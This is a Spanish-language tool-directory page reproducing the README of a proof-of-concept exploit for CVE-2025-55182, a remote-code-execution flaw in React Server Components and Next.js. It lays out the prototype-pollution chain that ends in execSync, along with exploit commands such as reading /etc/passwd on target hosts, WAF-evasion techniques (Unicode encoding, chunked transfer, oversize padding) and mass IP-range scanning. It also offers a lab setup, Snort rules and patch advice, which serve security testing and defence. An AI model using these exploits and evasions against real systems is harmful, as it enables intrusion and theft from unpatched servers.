Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-POC — CVE-2025-55182-POC | Kitploit
Herramientas/GitHubGitHub/zxz3650/cve-2025-55182-poc
Análisis de VulnerabilidadesExplotaciónEvasión de IDS/IPSExplotación de Aplicaciones WebEvasión de WAFPruebas de PenetraciónDesarrollo de Payloads
GitHubzxz3650/cve-2025-55182-poc

CVE-2025-55182-POC

CVE-2025-55182-POC

Ver Repositorio
17hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182 POC & Detección

Colección de herramientas de explotación y detección de la vulnerabilidad de deserialización insegura de React Server Components (RSC)

Información de la vulnerabilidad

  • CVE-ID: CVE-2025-55182
  • Versiones afectadas: React 19.x, Next.js 15.x/16.x (usando App Router)
  • Vector de ataque: RCE mediante contaminación de prototipos durante la deserialización del protocolo RSC Flight
  • Gravedad: Crítica (CVSS 10.0)

📦 Componentes

1. Entorno vulnerable (Docker)

  • docker-compose.yml - Next.js 15.0.3 + React 19.0.0-rc
  • vulnerable-app/ - Código de Server Action vulnerable

2. Herramienta de explotación

  • exploit_advanced.py - Soporta múltiples técnicas de ataque (Básico/Avanzado/Chunked/Oversize)

3. Escáner de vulnerabilidades

Descargar herramienta
  • rsc_vulnerability_checker_multi.py - Herramienta de diagnóstico de vulnerabilidades multiobjetivo

4. Reglas de detección IDS

  • rules_priority_based - Conjunto de reglas de detección basadas en prioridad de Snort

🚀 Inicio rápido

1. Configurar entorno vulnerable

root@kitploit:~
cd vulnerable-app
docker-compose up -d
# Verificar acceso en http://localhost:3000

2. Diagnóstico de vulnerabilidad

root@kitploit:~
# Prueba de una sola URL
python3 rsc_vulnerability_checker_multi.py http://localhost:3000

# Escaneo por lotes de varias URL
python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com

# Escaneo de rango IP
python3 rsc_vulnerability_checker_multi.py -r 192.168.1.1-254 -p 3000 --threads 20

# Lectura desde archivo
python3 rsc_vulnerability_checker_multi.py -f targets.txt -o results.csv

3. Ejecutar explotación

root@kitploit:~
# Ataque básico
python3 exploit_advanced.py -u http://localhost:3000 -c "whoami" --basic

# Ataque avanzado (cadena de prototipos + thenable)
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --advanced

# Evasión WAF - Codificación Unicode
python3 exploit_advanced.py -u http://target.com -c "cat /etc/passwd" --advanced --waf-bypass

# Evasión WAF - Transfer-Encoding fragmentado
python3 exploit_advanced.py -u http://target.com -c "uname -a" --chunked

# Evasión WAF - Payload de gran tamaño (AWS WAF)
python3 exploit_advanced.py -u http://target.com -c "id" --oversize 65536

# Intentar todas las técnicas secuencialmente
python3 exploit_advanced.py -u http://target.com -c "whoami" --all -v

4. Prueba de detección de red

root@kitploit:~
# Capturar tráfico de ataque
sudo tcpdump -i lo0 -w attack.pcap 'port 3000' &
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --all
sudo pkill tcpdump

# Analizar con Snort
snort -c snort.conf -r attack.pcap -A console -k none

Detalles de la técnica de explotación

Modo Básico

Envío directo del payload RSC Flight

root@kitploit:~
# Llamada directa a Server Action
POST /?__rsc_action__ HTTP/1.1
Content-Type: text/plain
next-action: <action_id>

["$@1",["$","$L2",null,{...}]]

Modo Avanzado

RCE mediante contaminación de prototipos (Prototype Pollution)

root@kitploit:~
// Principio clave
{
  "then": "$1:__proto__:then",           // Desencadenar Chunk.prototype.then
  "_response": {                          // Inyectar respuesta falsa
    "_formData": {...},
    "_prefix": ""
  },
  "$1:constructor:constructor": Function  // Acceder al constructor Function
}

Cadena de ataque:

  1. Establecer Chunk.prototype.then mediante contaminación de __proto__
  2. Controlar FormData mediante inyección de objeto _response
  3. El manejador $B llama a response._formData.get(id)
  4. Acceder a Function mediante la cadena constructor:constructor
  5. Ejecutar process.mainModule.require('child_process').execSync(cmd)

Modo Fragmentado (Chunked)

Distribución de patrones usando Transfer-Encoding

root@kitploit:~
POST /?__rsc_action__ HTTP/1.1
Transfer-Encoding: chunked

10
["$@1",["$","
15
$L2",null,{"then
...
  • Evasión de coincidencia de patrones WAF (división de palabras clave)
  • Imposible de inspeccionar con un solo búfer

Modo de Gran Tamaño (Oversize)

Evasión del límite de tamaño de AWS WAF

root@kitploit:~
payload = original_payload + "X" * (size - len(original_payload))
# AWS WAF: solo inspecciona los primeros 8KB
# Colocar el código de ataque real después de 8KB

📊 Prioridad de reglas de detección

Reglas P0 (SID 2000xxx) - Bloqueo inmediato

  • process.mainModule.require + child_process + execSync
  • __proto__ + resolved_model + módulo RCE
  • Acceso a /etc/passwd, /etc/shadow, .ssh/id_rsa

📋 Requisitos

Obligatorio

  • Docker y Docker Compose
  • Python 3.8+
  • Biblioteca requests
    root@kitploit:~
    pip install requests
    

Opcional (para pruebas de detección)

  • Snort 2.9+
  • tcpdump

🔍 Uso del escáner de vulnerabilidades

Uso básico

root@kitploit:~
# Una sola URL
python3 rsc_vulnerability_checker_multi.py http://target.com

# Múltiples URL
python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com

Uso avanzado

root@kitploit:~
# Escaneo de rango IP (CIDR)
python3 rsc_vulnerability_checker_multi.py -r 192.168.1.0/24 -p 3000

# Escaneo de rango IP (guión)
python3 rsc_vulnerability_checker_multi.py -r 10.0.0.1-254 -p 8080 --threads 50

# Entrada/salida de archivo
python3 rsc_vulnerability_checker_multi.py -f targets.txt -o scan_results.csv

# Modo verbose
python3 rsc_vulnerability_checker_multi.py http://target.com -v

Formato de salida

root@kitploit:~
[VULNERABLE] http://target.com:3000 - React 19.0.0-rc, Next.js 15.0.3
[SAFE] http://example.com:3000 - No vulnerable
[ERROR] http://offline.com:3000 - Tiempo de espera de conexión

🎯 Opciones de la herramienta de explotación

Modo de ataque

  • --basic: Enviar payload RSC Flight directamente
  • --advanced: Técnica de cadena de prototipos + thenable
  • --chunked: Transmisión fragmentada con Transfer-Encoding
  • --oversize <size>: Payload de gran tamaño (por defecto: 65536 bytes)
  • --all: Probar todas las técnicas secuencialmente

Evasión de WAF

  • --waf-bypass: Codificación Unicode (constructor → \u0063onstructor)
  • --chunked: Disposición de patrones distribuidos
  • --oversize: Evasión del límite de tamaño de AWS WAF

Otros

  • -v, --verbose: Salida detallada
  • -t, --timeout: Tiempo de espera de la solicitud (por defecto: 10 segundos)

🛡 Defensa y detección

A nivel de aplicación

  1. Actualizar de React 19.0.0-rc a 19.0.0 (estable)
  2. Actualizar de Next.js 15.0.3 a 15.1.0+
  3. Reforzar la validación de entrada de Server Actions
  4. Deshabilitar funciones experimental

A nivel de red

  1. Aplicar reglas de Snort (rules_priority_based)
  2. Políticas WAF:
    • Bloquear palabra clave __proto__
    • Bloquear patrón process.mainModule.require
    • Limitar tamaño del cuerpo POST (< 1MB)
  3. Limitación de tasa (Rate Limiting) para solicitudes de Server Action

Monitoreo

root@kitploit:~
# Monitoreo en tiempo real con Snort
snort -c snort.conf -i eth0 -A console

# Análisis de archivo de registro
snort -c snort.conf -r network.pcap -A fast

Este contenido está destinado únicamente para fines de investigación, educación y verificación de diagnóstico.